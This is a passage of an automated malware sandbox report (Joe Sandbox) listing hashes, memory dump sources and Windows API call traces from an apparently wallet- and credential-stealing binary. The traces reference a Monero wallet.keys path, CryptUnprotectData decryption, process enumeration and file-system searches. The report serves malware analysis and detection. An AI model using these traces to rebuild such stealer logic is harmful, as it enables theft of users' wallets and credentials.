                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: e61ebf20086cdaff7e9edcecc324e0b714422e3ca5c724b752b2f10259a98d0d
                                        • Instruction ID: 67de82b50dbe05b3197290d503345d18929bb5cd3cd5826d0ff38a21e2185317
                                        • Opcode Fuzzy Hash: e61ebf20086cdaff7e9edcecc324e0b714422e3ca5c724b752b2f10259a98d0d
                                        • Instruction Fuzzy Hash: 39415C71940218ABDB24DB95DC99BEEB778FF44700F204299E40A76281DB342F89DFA1
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CC0D73), ref: 00CAE4A2
                                        • StrCmpCA.SHLWAPI(?,00CC14F8), ref: 00CAE4F2
                                        • StrCmpCA.SHLWAPI(?,00CC14FC), ref: 00CAE508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAEBDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 7ee21fefeefaed825ae5ba1ddd86946d64fd4e12b6f2e4775274ab51ef4d4879
                                        • Instruction ID: 090f8cb592b3462fcad44991c51bf2d619e923655634711379ea224d26d90dcf
                                        • Opcode Fuzzy Hash: 7ee21fefeefaed825ae5ba1ddd86946d64fd4e12b6f2e4775274ab51ef4d4879
                                        • Instruction Fuzzy Hash: 80123171910118AADB24FB61DCA6EED733CAF54300F4045A9B54AA64D1EF306F49EFA2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %iv~$@wX$Qlx_$Tqo$XeNm$XeNm
                                        • API String ID: 0-4062974250
                                        • Opcode ID: 74e6cfc0dd3644992bebae6c8952f48eaa4b442d404c3a01adc22757b76e8969
                                        • Instruction ID: de4a28d5cb9ea832b2e8ea9c026d48bf77a8c938253e11a4369eee1d8c3a60f6
                                        • Opcode Fuzzy Hash: 74e6cfc0dd3644992bebae6c8952f48eaa4b442d404c3a01adc22757b76e8969
                                        • Instruction Fuzzy Hash: F762F6F3A0C200AFE704AE29DC4577AB7E9EF94320F16893DEAC5C7744EA3558058796
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CAC871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CAC87C
                                        • lstrcat.KERNEL32(?,00CC0B46), ref: 00CAC943
                                        • lstrcat.KERNEL32(?,00CC0B47), ref: 00CAC957
                                        • lstrcat.KERNEL32(?,00CC0B4E), ref: 00CAC978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 94109f0010dca7fe5e7c65a889b23509ccd4691542ab08b666706da2fd782bb4
                                        • Instruction ID: 5d71e8fa6585fb4f30bc3a2b21eca5cc939f57514dc67243369afe8d2b5b409a
                                        • Opcode Fuzzy Hash: 94109f0010dca7fe5e7c65a889b23509ccd4691542ab08b666706da2fd782bb4
                                        • Instruction Fuzzy Hash: 45414CB590421EDFCB10DFA4DD89BFEB7B8AB48304F1441B8F509A6280D7706A84CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00CA724D
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA7254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00CA7281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00CA72A4
                                        • LocalFree.KERNEL32(?), ref: 00CA72AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 217c047589e5f3ccfc7eb41e3127d76118a898a5077706d4f727e9fe498fe696
                                        • Instruction ID: 17c83a638261e0f7bf700e871656a8bf0c05130b4e4cd9c76a84a8d1aad1dfa3
                                        • Opcode Fuzzy Hash: 217c047589e5f3ccfc7eb41e3127d76118a898a5077706d4f727e9fe498fe696
                                        • Instruction Fuzzy Hash: 170100B5A40208BFDB14DBD5DD89F9D7778AB44704F144159FB05BA2C0D670BA048B65
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CB961E
                                        • Process32First.KERNEL32(00CC0ACA,00000128), ref: 00CB9632
                                        • Process32Next.KERNEL32(00CC0ACA,00000128), ref: 00CB9647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00CB965C
                                        • CloseHandle.KERNEL32(00CC0ACA), ref: 00CB967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 2fa818a18ce16a2a9aacfe1a3534b902bc0f180a8249f438d0da754b5d3dca1a
                                        • Instruction ID: ac05492856b6b59101cf4d8d4dbd1ff6c83d751632f29e534a016e3ab6f4e949
                                        • Opcode Fuzzy Hash: 2fa818a18ce16a2a9aacfe1a3534b902bc0f180a8249f438d0da754b5d3dca1a
                                        • Instruction Fuzzy Hash: E6010CB5A00208AFDB54DFA6CD88BEDBBF9EB58300F144199B909A6240D774AB44CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 7R`E$`p-w$<g$Kz
                                        • API String ID: 0-4293365461
                                        • Opcode ID: 0169029f6acc286b84df44d9c15a167e26a9bb4298e0789c780bbd8e88a0952b
                                        • Instruction ID: 071da8644f436fe7a631e663cae20c18ec52054887e051d8858cd2cb45afeb00
                                        • Opcode Fuzzy Hash: 0169029f6acc286b84df44d9c15a167e26a9bb4298e0789c780bbd8e88a0952b
                                        • Instruction Fuzzy Hash: EFB2F6F350C2049FE304AF29EC8567AFBE9EFD4720F1A892DE6C483744EA3558458697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: `r}$b[}$o>u$pLH
                                        • API String ID: 0-3566674915
                                        • Opcode ID: ad9a971b24cc8aaea1c3ab85cd77a12af4eea2067e503cf891875f356f847f91
                                        • Instruction ID: 49b0535e4f39b8ac77dff6bc2b46f46d7f0e581d09cd33cc01ba0a7cb3d6aeb4
                                        • Opcode Fuzzy Hash: ad9a971b24cc8aaea1c3ab85cd77a12af4eea2067e503cf891875f356f847f91
                                        • Instruction Fuzzy Hash: 0AB2E3F360C2049FE7046E29EC8567AFBE9EF94320F1A493DEAC583344EA3558058797
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CC05B7), ref: 00CB86CA
                                        • Process32First.KERNEL32(?,00000128), ref: 00CB86DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 00CB86F3
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • CloseHandle.KERNEL32(?), ref: 00CB8761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: d01989869840e3164b0f4e9362ae98725cbe151edf83d1ade353a60aef107943
                                        • Instruction ID: 7d70e672911fa455a7946d20427398f7c5e7b7d262d4716ac32c2a8e4cc3925e
                                        • Opcode Fuzzy Hash: d01989869840e3164b0f4e9362ae98725cbe151edf83d1ade353a60aef107943
                                        • Instruction Fuzzy Hash: 3E312471901218ABCB24EB95CC95FEEB77CEB45700F1041A9F10AB61A0DF316A49CFA2
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00CA5184,40000001,00000000,00000000,?,00CA5184), ref: 00CB8EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 0fa851bc156581de5912cafb93890caff27adde213547be2344ef76a4d749141
                                        • Instruction ID: 2bab91edb241dfd50c84b5c02c55b512e7f159d8b6879dd06e9ecf89c1e35ebe
                                        • Opcode Fuzzy Hash: 0fa851bc156581de5912cafb93890caff27adde213547be2344ef76a4d749141
                                        • Instruction Fuzzy Hash: C9111874200209BFDB04CFA5D888FBB37ADAF89300F149458F9198B250DB35ED4ADB64
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: a0505fda432786deea4f23fc135543eafb90bf8877d800fca90bfbfd1dfe3dba
                                        • Instruction ID: 1115cd2fc245e0097e29550f5dc8849b58bbad96eb677895ed5d15f3ccc45300
                                        • Opcode Fuzzy Hash: a0505fda432786deea4f23fc135543eafb90bf8877d800fca90bfbfd1dfe3dba
                                        • Instruction Fuzzy Hash: 3311A2B4240208EFEB14CF64DC95FAA77B5FB89704F208058F9159F390C7B6AA45CBA4
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79B0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB79B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79C4
                                        • wsprintfA.USER32 ref: 00CB79F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
